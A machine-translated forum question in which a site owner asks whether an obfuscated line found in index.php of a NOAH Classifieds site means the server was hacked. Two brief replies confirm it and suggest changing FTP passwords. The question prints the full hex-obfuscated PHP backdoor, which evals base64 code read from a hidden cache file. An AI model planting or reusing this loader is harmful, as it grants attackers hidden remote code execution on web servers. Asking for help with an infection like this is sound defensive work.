0
我隨機瀏覽我們的服務器中的一個網站,我發現這段代碼作爲index.php的第二行:我的網站被黑客入侵了嗎?
@preg_replace("\x24\50\x5b\136\x3c\135\x2b\51\x24\163\x69\145","\x65\166\x61\154\x28\47\x24\147\x63\155\x3d\67\x37\67\x37\61\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x67\143\x6d\75\x37\67\x37\67\x31\73","\x4c\62\x68\166\x62\127\x55\166\x59\62\x78\150\x63\63\x4e\160\x5a\155\x6b\166\x63\110\x56\151\x62\107\x6c\152\x58\62\x68\60\x62\127\x77\166\x62\107\x46\165\x5a\171\x39\152\x59\127\x4e\157\x5a\123\x38\165\x4a\124\x67\171\x4f\105\x55\154\x4d\104\x41\170\x4d\171\x56\103\x4f\105\x59\172\x4a\125\x4a\104\x4d\125\x49\154\x51\152\x49\171\x51\151\x55\60\x52\152\x55\63");
當我運行它,我得到:
Warning: file(/home/classifi/public_html/lang/cache/.%828E%0013%B8F3%BC1B%B22B%4F57): failed to open stream: No such file or directory
它看起來好像被混淆了,做了一些它實際上不應該做的事情。任何人都可以向我解釋我如何弄清楚這行代碼的意圖是什麼?而且我的服務器是否真的遭到黑客入侵?
肇事者試圖做什麼?這是一個運行NOAH CLASSIFIEDS腳本的網站。
可悲的是,是的,這是一個六編碼的文本。您需要修復安全漏洞。 –
確實如此,你在那裏運行開源軟件嗎?像Joomla?我建議你改變你的ftp密碼開始。 – Cliffordwh
謝謝你們,但我想弄清楚黑客做了什麼? – coderama